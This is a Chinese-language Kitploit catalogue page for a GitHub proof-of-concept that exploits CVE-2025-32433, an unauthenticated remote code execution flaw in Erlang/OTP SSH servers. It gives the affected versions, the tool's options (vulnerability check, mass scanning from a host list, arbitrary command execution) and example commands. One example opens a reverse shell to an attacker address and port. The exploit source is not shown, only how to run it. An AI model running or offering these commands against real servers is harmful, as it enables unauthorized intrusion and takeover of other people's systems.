Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC — 该漏洞允许具有网络访问权限的攻击者在未经预先认证的情况下,在 Erlang/OTP SSH 服务器上执行任意代码。 | Kitploit
工具/GitHubGitHub/omer-efe-curkus/cve-2025-32433-erlang-otp-ssh-rce-poc
漏洞分析漏洞利用网络安全渗透测试命令与控制远程访问工具
GitHubomer-efe-curkus/cve-2025-32433-erlang-otp-ssh-rce-poc

CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC

该漏洞允许具有网络访问权限的攻击者在未经预先认证的情况下,在 Erlang/OTP SSH 服务器上执行任意代码。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
1621年前尚未审核

CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC

该漏洞允许具有网络访问权限的攻击者在无需事先认证的情况下,对 Erlang/OTP SSH 服务器执行任意代码。

描述

已在 Erlang/OTP SSH 服务器中发现一个严重漏洞,可能允许攻击者执行未经认证的远程代码执行(RCE)。通过利用 SSH 协议消息处理中的缺陷,恶意行为者可在没有有效凭据的情况下获得对受影响系统的未授权访问并执行任意命令。这可能导致目标主机被攻陷,使第三方能够未经授权访问和操纵敏感数据,或发起拒绝服务攻击。

受影响版本

root@kitploit:~
OTP-27.3.2 and earlier
OTP-26.2.5.10 and earlier
OTP-25.3.2.19 and earlier

功能

  • 漏洞检测:判断目标是否存在 CVE-2025-32433 漏洞。
  • 漏洞利用:执行任意命令。
  • 反向 Shell:发起基于 bash 的反向 Shell。

使用方法

root@kitploit:~
python cve-2025-32433.py <host> [options]

选项:

root@kitploit:~
-p PORT, --port PORT: SSH port (default: 22)

-t TIMEOUT, --timeout TIMEOUT: Connection timeout in seconds (default: 5)

-c COMMAND, --command COMMAND: Custom command to execute

--check: Check if the target is vulnerable

-u urls.txt, --urlfile urls.txt: File containing list of hosts to scan (one per line)

-o output.txt, --output output.txt: Output file to store results.

--shell: Launch a reverse shell

--lhost LHOST: Attacker's IP for reverse shell

--lport LPORT: Attacker's port for reverse shell (default: 4444)

示例

检查漏洞:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 --check

执行命令:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 -c 'cat pwned.txt'

发起反向 Shell:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

参考

GitHub 安全公告

NVD CVE-2025-32433

Platform Security

下载工具